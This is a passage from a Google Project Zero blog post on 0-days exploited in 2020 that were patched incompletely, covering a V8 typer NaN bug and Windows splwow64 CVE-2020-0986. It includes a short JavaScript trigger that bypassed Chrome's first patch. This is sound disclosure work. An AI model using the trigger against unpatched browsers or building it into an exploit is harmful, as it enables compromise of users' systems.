[The patch](<https://chromium.googlesource.com/v8/v8.git/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1>) that Chrome released for this vulnerability added an explicit check for the NaN case. But the patch made an assumption that leads to it being insufficient: that the loop variable can only become NaN if the sum or difference of the initial value of the variable and the increment is NaN. The issue is that the value of the increment can change inside the loop body. Therefore the following trigger would still work even after the patch was applied.

```javascript
var increment = -Infinity;
var k = 0;
// The initial loop value is 0 and the increment is -Infinity.
// This is permissible because 0 + -Infinity = -Infinity, an integer.
for (var i = 0; i < 1; i += increment) {
  if (i == -Infinity) {
    // Once the initial variable equals -Infinity (one loop through)
    // the increment is changed to +Infinity. -Infinity + +Infinity = NaN
    increment = +Infinity;
  }
  if (++k > 10) {
    break;
  }
}
```

To “revive” the entire exploit, the attacker only needed to change a couple of lines in the trigger to have another working 0-day. [This incomplete fix was reported](<https://bugs.chromium.org/p/chromium/issues/detail?id=1051017>) to Chrome in February 2020. [This patch](<https://chromium.googlesource.com/v8/v8.git/+/a2e971c56d1c46f7c71ccaf33057057308cc8484>) was more conservative: it bailed out as soon as the typer detected that the increment could be +Infinity or -Infinity.

Unfortunately, this patch introduced an additional security vulnerability, which allowed for a wider choice of possible “type confusions”.
Again, check out [Sergei’s blog post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>) if you’re interested in more details.

This is an example where the exploit is found after the bug was initially reported by security researchers. As an aside, I think this shows why it’s important to work towards “correct & comprehensive” patches in general, not just vulnerabilities known to be exploited in-the-wild. The security industry [knows there is a detection gap](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>) in our ability to detect 0-days exploited in-the-wild. We don’t find and detect all exploited 0-days, and we certainly don’t find them all in a timely manner.

## Windows splwow64 CVE-2020-0986

This vulnerability has already been discussed in the previous section on variants. After [Kaspersky reported that CVE-2020-0986 was actively exploited](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>) as a 0-day, I began performing root cause analysis and variant analysis on the vulnerability. The vulnerability was patched in June 2020, but it was only [disclosed as exploited in-the-wild in August 2020](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>).

Microsoft’s patch for CVE-2020-0986 replaced the raw pointers that an attacker could previously send through the LPC message with offsets. This didn’t fix the root cause vulnerability; it just changed how an attacker would trigger the vulnerability. [This issue was reported](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft in September 2020, including a working trigger. Microsoft released a more complete patch for the vulnerability in January 2021, four months later.
This new patch checks that all memcpy operations only read from and copy into the buffer of the message.

# Correct and comprehensive patches

We’ve detailed how six 0-days that were exploited in-the-wild in 2020 were closely related to vulnerabilities that had been seen previously. We also showed how three vulnerabilities that were exploited in-the-wild were either not fixed correctly or not fixed comprehensively when patched this year.

When 0-day exploits are detected in-the-wild, it’s the failure case for an attacker. It’s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can’t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, and they must develop a brand new exploitation method. To do that, we need correct and comprehensive fixes.

Being able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension.
While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done.

Exactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.

While the aim is that one day all vulnerabilities will be fixed correctly and comprehensively, each step we take in that direction will make it harder for attackers to exploit 0-days.

In 2021, Project Zero will continue completing root cause and variant analyses for vulnerabilities reported as in-the-wild. We will also be looking over the patches for these exploited vulnerabilities with more scrutiny. We hope to also expand our work into variant analysis on other vulnerabilities as well. We hope more researchers will join us in this work. (If you’re an aspiring vulnerability researcher, variant analysis could be a great way to begin building your skills! Here are two conference talks on the topic: [my talk at BluehatIL 2020](<https://www.youtube.com/watch?v=mC1Pwsdy814>) and [Ki Chan Ahn at OffensiveCon 2020](<https://www.youtube.com/watch?v=fTNzylTMYks>).)

In addition, we would really like to work more closely with vendors on patches and mitigations prior to the patch being released. We often have ideas of how issues can be addressed. Early collaboration and offering feedback during the patch design and implementation process is good for everyone.
Researchers and vendors alike can save time, resources, and energy by working together, rather than patch diffing a binary after release and realizing the vulnerability was not completely fixed.

Source: “Déjà vu-lnerability”, Google Project Zero, published 2021-02-03, <https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html>